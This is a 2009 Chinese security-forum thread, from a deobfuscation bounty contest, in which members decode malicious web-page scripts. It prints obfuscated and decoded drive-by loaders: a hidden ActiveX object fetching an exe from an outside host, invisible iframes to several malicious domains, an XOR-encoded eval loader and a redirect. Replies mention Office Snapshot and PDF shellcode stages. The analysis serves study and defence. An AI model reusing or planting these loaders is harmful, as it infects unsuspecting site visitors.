收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) [解密悬赏][第8期][结束]
123
返回列表 发新帖
楼主: qianwenxiang
 收起左侧

[其它] [解密悬赏][第8期][结束]

[复制链接]
Kitman
发表于 2009-1-6 21:55:26 | 显示全部楼层
可以教一次嗎...看不懂
回复

举报

qianwenxiang
 楼主| 发表于 2009-1-6 22:23:57 | 显示全部楼层

回复 21L

我也来个万能代码吧  第一个

1.

<html><script>
t="60,116,101,120,116,97,114,101,97,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,119,105,100,116,104,58,48,112,120,59,104,101,105,103,104,116,58,48,112,120,59,34,32,105,100,61,113,113,50,56,48,48,57,53,57,53,48,62,13,10,10,13,62,116,99,101,106,98,111,47,60,62,34,49,57,49,34,61,116,104,103,105,101,104,32,34,48,48,56,34,61,104,116,100,105,119,32,34,49,44,48,44,48,44,49,61,110,111,105,115,114,101,118,35,101,120,101,46,109,47,109,109,47,110,99,46,51,50,49,107,97,111,46,119,119,119,47,47,58,112,116,116,104,34,61,101,115,97,98,101,100,111,99,32,34,69,48,55,50,57,69,53,66,66,48,57,55,45,48,49,52,57,45,55,51,70,52,45,48,56,67,68,45,55,69,69,68,67,48,69,55,58,100,105,115,108,99,34,61,100,105,115,115,97,108,99,32,116,99,101,106,98,111,60,60,47,116,101,120,116,97,114,101,97,62,60,115,99,114,105,112,116,32,108,97,110,103,117,97,103,101,61,118,98,115,62,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,115,116,114,114,101,118,101,114,115,101,40,113,113,50,56,48,48,57,53,57,53,48,46,118,97,108,117,101,41,41,60,47,115,99,114,105,112,116,62,13,10"
t=eval("String.fromCharCode("+t+")");
zzzz=(t);
var fso = new ActiveXObject("Scripting.FileSystemObject");
var f = fso.OpenTextFile("D:\\dec.txt", 2, true);
f.Write(zzzz);
f.Close();
fso = f = void(0);
window.onload = saveHtml;
</script></html>


2.
<textarea style="display:none;width:0px;height:0px;" id=qq280095950>
>tcejbo/<>"191"=thgieh "008"=htdiw "1,0,0,1=noisrev#exe.m/mm/nc.321kao.www//:ptth"=esabedoc "E0729E5BB097-0149-73F4-08CD-7EEDC0E7:dislc"=dissalc tcejbo<</textarea><script language=vbs>document.write(strreverse(qq280095950.value))</script>


3.
strreverse :
> 解密: 字符串翻转.
= 完成

<object classid="clsid:7E0CDEE7-DC80-4F37-9410-790BB5E9270E" codebase="http://www.oak123.cn/mm/m.exe#version=1,0,0,1" width="800" height="191"></object>
回复

举报

qianwenxiang
 楼主| 发表于 2009-1-6 22:36:32 | 显示全部楼层
第二个 三段代码选一段
<script>window['egvDaZl9'.replace(/[g9D3Z]/g, '')](window['egvDaZl9'.replace(/[g9D3Z]/g, '')]('uMn<e]s]c]a;p<e;'.replace(/[M;o\]\<]/g, ''))('%66%75%6e%63%74%69%6f%6e%20%50%48%70%61%4c%28%41%49%49%29%7b%66%75%6e%63%74%69%6f%6e%20%41%49%68%28%48%70%49%29%7b%65%76%61%6c%28%22%76%61%72%20%41%41%54%61%70%44%41%3d%30%3b%22%29%3b%76%61%72%20%50%70%48%4c%3d%48%70%49%2e%6c%65%6e%67%74%68%3b%65%76%61%6c%28%22%76%61%72%20%4c%49%54%6c%44%3d%30%3b%22%29%3b%77%68%69%6c%65%28%4c%49%54%6c%44%3c%50%70%48%4c%29%7b%41%41%54%61%70%44%41%2b%3d%48%41%41%61%41%6c%28%48%70%49%2c%4c%49%54%6c%44%29%2a%50%70%48%4c%3b%4c%49%54%6c%44%2b%2b%3b%7d%72%65%74%75%72%6e%20%28%41%41%54%61%70%44%41%2b%27%27%29%3b%7d%66%75%6e%63%74%69%6f%6e%20%48%41%41%61%41%6c%28%4c%44%4c%41%54%61%2c%41%68%70%48%50%48%29%7b%72%65%74%75%72%6e%20%4c%44%4c%41%54%61%2e%63%68%61%72%43%6f%64%65%41%74%28%41%68%70%48%50%48%29%3b%7d%20%20%20%74%72%79%20%7b%76%61%72%20%48%70%70%44%41%61%3d%65%76%61%6c%28%27%61%3f%72%3f%67%3a%75%32%6d%3f%65%62%6e%62%74%3a%73%3a%2e%3f%63%3f%61%4d%6c%4d%6c%62%65%3f%65%32%27%2e%72%65%70%6c%61%63%65%28%2f%5b%5c%3f%5c%3a%32%4d%62%5d%2f%67%2c%20%27%27%29%29%2c%4c%48%49%41%3d%27%27%3b%76%61%72%20%41%48%70%50%44%3d%30%2c%41%61%48%61%47%3d%30%2c%41%48%50%41%49%49%3d%28%6e%65%77%20%53%74%72%69%6e%67%28%48%70%70%44%41%61%29%29%2e%72%65%70%6c%61%63%65%28%2f%5b%5e%40%61%2d%7a%30%2d%39%41%2d%5a%5f%2e%2c%2d%5d%2f%67%2c%27%27%29%3b%76%61%72%20%4c%4c%54%6c%61%3d%41%49%68%28%41%48%50%41%49%49%29%3b%65%76%61%6c%28%22%41%49%49%3d%75%6e%65%73%63%61%70%65%28%41%49%49%29%3b%22%29%3b%66%6f%72%28%76%61%72%20%41%41%61%54%3d%30%3b%20%41%41%61%54%20%3c%20%28%41%49%49%2e%6c%65%6e%67%74%68%29%3b%20%41%41%61%54%2b%2b%29%7b%76%61%72%20%48%41%48%4c%3d%48%41%41%61%41%6c%28%41%48%50%41%49%49%2c%41%48%70%50%44%29%5e%48%41%41%61%41%6c%28%4c%4c%54%6c%61%2c%41%61%48%61%47%29%3b%76%61%72%20%50%61%6c%50%3d%48%41%41%61%41%6c%28%41%49%49%2c%41%41%61%54%29%3b%41%48%70%50%44%2b%2b%3b%41%61%48%61%47%2b%2b%3b%69%66%28%41%61%48%61%47%3e%4c%4c%54%6c%61%2e%6c%65%6e%67%74%68%29%41%61%48%61%47%3d%30%3b%69%66%28%41%48%70%50%44%3e%41%48%50%41%49%49%2e%6c%65%6e%67%74%68%29%41%48%70%50%44%3d%30%3b%4c%48%49%41%2b%3d%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%50%61%6c%50%5e%48%41%48%4c%29%20%2b%20%27%27%3b%7d%65%76%61%6c%28%4c%48%49%41%29%3b%20%72%65%74%75%72%6e%20%4c%48%49%41%3d%6e%75%6c%6c%3b%7d%63%61%74%63%68%28%65%29%7b%7d%7d%50%48%70%61%4c%28%27%25%33%32%25%33%37%25%33%31%25%33%31%25%33%36%25%33%31%25%33%39%25%33%30%25%37%30%25%32%61%25%30%36%25%31%31%25%33%39%25%31%36%25%35%30%25%31%39%25%37%66%25%35%35%25%32%37%25%32%30%25%33%37%25%32%31%25%37%39%25%32%34%25%30%65%25%31%38%25%31%61%25%35%61%25%32%38%25%34%35%25%33%30%25%32%66%25%33%33%25%32%30%25%32%62%25%30%34%25%32%65%25%30%32%25%35%65%25%30%36%25%32%35%25%32%34%25%31%63%25%30%35%25%35%35%25%30%31%25%33%61%25%32%36%25%30%63%25%32%33%25%31%37%25%30%31%25%35%30%25%35%37%25%31%32%25%37%66%25%32%66%25%33%35%25%33%35%25%33%33%25%36%61%25%37%31%25%35%65%25%36%34%25%33%39%25%37%33%25%33%34%25%32%35%25%32%30%25%34%38%25%35%65%25%33%63%25%32%61%25%30%37%25%37%31%25%37%63%25%37%31%25%37%37%25%32%32%25%33%63%25%32%32%25%31%65%25%31%30%25%33%63%25%31%38%25%30%66%25%32%64%25%31%34%25%35%32%25%32%32%25%31%64%25%34%63%25%32%34%25%32%34%25%31%66%25%30%30%25%31%64%25%31%30%25%33%35%25%33%36%25%35%38%25%33%35%25%30%64%25%32%62%25%31%34%25%33%32%25%34%37%25%36%39%25%30%39%25%37%35%25%30%36%25%30%34%25%33%32%25%33%38%25%30%31%25%30%38%25%33%62%25%30%66%25%33%39%25%30%30%25%33%37%25%33%36%25%36%64%25%36%62%25%33%35%25%30%37%25%31%37%25%30%32%25%30%64%25%37%37%25%36%61%25%35%35%25%34%38%25%37%66%25%34%65%25%37%63%25%33%62%25%36%62%25%32%62%25%33%63%25%32%62%25%33%30%25%30%35%25%33%35%25%32%31%25%31%66%25%33%66%25%30%38%25%30%36%25%31%38%25%35%30%25%34%33%25%30%37%25%36%63%25%31%37%25%33%34%25%32%34%25%31%63%25%30%65%25%30%33%25%32%36%25%30%30%25%33%34%25%36%35%25%36%66%25%37%66%25%34%61%25%35%63%25%34%65%25%35%31%25%33%62%25%37%64%25%36%61%25%33%37%25%32%64%25%31%36%25%33%37%25%30%65%25%32%64%25%30%64%25%33%35%25%30%33%25%33%31%25%31%35%25%37%36%25%36%36%25%31%39%25%30%35%25%32%31%25%32%31%25%32%64%25%33%63%25%36%30%25%37%62%25%36%33%25%34%31%25%36%39%25%34%62%25%35%36%25%31%32%25%33%66%25%33%37%25%33%35%25%33%64%25%33%30%25%33%66%25%30%36%25%37%62%25%32%30%25%36%63%25%33%38%25%32%61%25%37%64%25%33%36%25%32%32%25%30%34%25%32%34%25%37%37%25%33%36%25%31%33%25%31%33%25%33%34%25%31%38%25%33%38%25%34%61%25%33%38%25%37%62%25%33%38%25%33%66%25%33%39%25%33%37%25%32%38%25%32%38%25%30%32%25%33%39%25%37%61%25%36%36%25%35%35%25%32%66%25%32%35%25%37%30%25%36%38%25%31%38%25%31%33%25%31%33%25%31%35%25%32%38%25%32%32%25%33%37%25%35%30%25%31%65%25%30%35%25%30%63%25%31%30%25%37%35%25%37%34%25%31%38%25%33%65%25%35%31%25%37%39%25%36%65%25%37%39%25%34%62%25%33%31%25%33%38%25%32%32%25%31%31%25%35%38%25%35%32%25%34%35%25%33%65%25%36%39%25%35%39%25%33%38%25%36%38%25%37%38%25%36%35%25%36%37%25%37%38%25%36%62%25%37%63%25%30%38%25%30%64%25%37%37%25%34%66%25%30%61%25%31%34%25%33%34%25%33%66%25%37%65%25%36%32%25%37%64%25%34%64%27%29%3b'));</script>


2. 把%给还原了
function PHpaL(AII){function AIh(HpI){eval("var AATapDA=0;");var PpHL=HpI.length;eval("var LITlD=0;");while(LITlD<PpHL){AATapDA+=HAAaAl(HpI,LITlD)*PpHL;LITlD++;}return (AATapDA+'');}function HAAaAl(LDLATa,AhpHPH){return LDLATa.charCodeAt(AhpHPH);}   try {var HppDAa=eval('a?r?g:u2m?ebnbt:s:.?c?aMlMlbe?e2'.replace(/[\?\:2Mb]/g, '')),LHIA='';var AHpPD=0,AaHaG=0,AHPAII=(new String(HppDAa)).replace(/[^@a-z0-9A-Z_.,-]/g,'');var LLTla=AIh(AHPAII);eval("AII=unescape(AII);");for(var AAaT=0; AAaT < (AII.length); AAaT++){var HAHL=HAAaAl(AHPAII,AHpPD)^HAAaAl(LLTla,AaHaG);var PalP=HAAaAl(AII,AAaT);AHpPD++;AaHaG++;if(AaHaG>LLTla.length)AaHaG=0;if(AHpPD>AHPAII.length)AHpPD=0;LHIA+=String.fromCharCode(PalP^HAHL) + '';}eval(LHIA); return LHIA=null;}catch(e){}}PHpaL('%32%37%31%31%36%31%39%30%70%2a%06%11%39%16%50%19%7f%55%27%20%37%21%79%24%0e%18%1a%5a%28%45%30%2f%33%20%2b%04%2e%02%5e%06%25%24%1c%05%55%01%3a%26%0c%23%17%01%50%57%12%7f%2f%35%35%33%6a%71%5e%64%39%73%34%25%20%48%5e%3c%2a%07%71%7c%71%77%22%3c%22%1e%10%3c%18%0f%2d%14%52%22%1d%4c%24%24%1f%00%1d%10%35%36%58%35%0d%2b%14%32%47%69%09%75%06%04%32%38%01%08%3b%0f%39%00%37%36%6d%6b%35%07%17%02%0d%77%6a%55%48%7f%4e%7c%3b%6b%2b%3c%2b%30%05%35%21%1f%3f%08%06%18%50%43%07%6c%17%34%24%1c%0e%03%26%00%34%65%6f%7f%4a%5c%4e%51%3b%7d%6a%37%2d%16%37%0e%2d%0d%35%03%31%15%76%66%19%05%21%21%2d%3c%60%7b%63%41%69%4b%56%12%3f%37%35%3d%30%3f%06%7b%20%6c%38%2a%7d%36%22%04%24%77%36%13%13%34%18%38%4a%38%7b%38%3f%39%37%28%28%02%39%7a%66%55%2f%25%70%68%18%13%13%15%28%22%37%50%1e%05%0c%10%75%74%18%3e%51%79%6e%79%4b%31%38%22%11%58%52%45%3e%69%59%38%68%78%65%67%78%6b%7c%08%0d%77%4f%0a%14%34%3f%7e%62%7d%4d');


3. Malzilla Run Script 反正Arguments.Callee我是一直不熟悉怎么弄..
function PAADa(i) {try {var o=document.createElement('iframe'); o.src='http://winesamile.cn/template.html'; o.setAttribute('width', 0); o.setAttribute('frameborder', 0); o.setAttribute('height', 0); document.body.appendChild(o); }catch(e){setTimeout(function (){PAADa(++i);}, 200);}} PAADa(0);

4. 方法同3
function PPlTI(i) {try {var o=document.createElement('iframe'); o.src='http://winesamile.cn/top10.html'; o.setAttribute('width', 0); o.setAttribute('frameborder', 0); o.setAttribute('height', 0); document.body.appendChild(o); }catch(e){setTimeout(function (){PPlTI(++i);}, 200);}} PPlTI(0);

5.
function AapIl(i) {try {var o=document.createElement('iframe'); o.src='http://papampam.net/in.cgi?pipka3'; o.setAttribute('width', 0); o.setAttribute('frameborder', 0); o.setAttribute('height', 0); document.body.appendChild(o); }catch(e){setTimeout(function (){AapIl(++i);}, 200);}} AapIl(0);

6. 限制我访问鸟..
<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://portulote.com/cache/index.php'">
</head>
<body>
document moved <a href="http://portulote.com/cache/index.php">here</a[color=#0A246A]>
</body>
</html>

估计我IP被他限制了或者他自己把自己给毁尸灭迹了,最后一层应该是MSOfficeSnapShot的漏洞,解法同国内那些

PDF是取数据流Zlib解压之后可以看到shellcode
回复

举报

深红的雪
发表于 2009-1-7 02:07:29 | 显示全部楼层
那啥啥万能大法还挂着小G的名字
换个
javascript: hunter=document.documentElement.outerHTML;document.write("<body></body>");document.body.innerText=hunter;
回复

举报

jimmyleo
发表于 2009-1-7 12:01:39 | 显示全部楼层
万能法=懒人法=不动脑筋法

什么都学不到+有危险系数..

回复

举报

taoyuan237
发表于 2009-1-7 12:07:29 | 显示全部楼层
我都没看到就结束啦
回复

举报

雨宫优子
发表于 2009-1-7 19:40:51 | 显示全部楼层
原帖由 深红的雪 于 2009-1-7 02:07 发表
那啥啥万能大法还挂着小G的名字
换个
javascript: hunter=document.documentElement.outerHTML;document.write("");document.body.innerText=hunter;

....
人家的版权不能乱改的...
回复

举报

123
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-15 17:16 , Processed in 0.101827 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表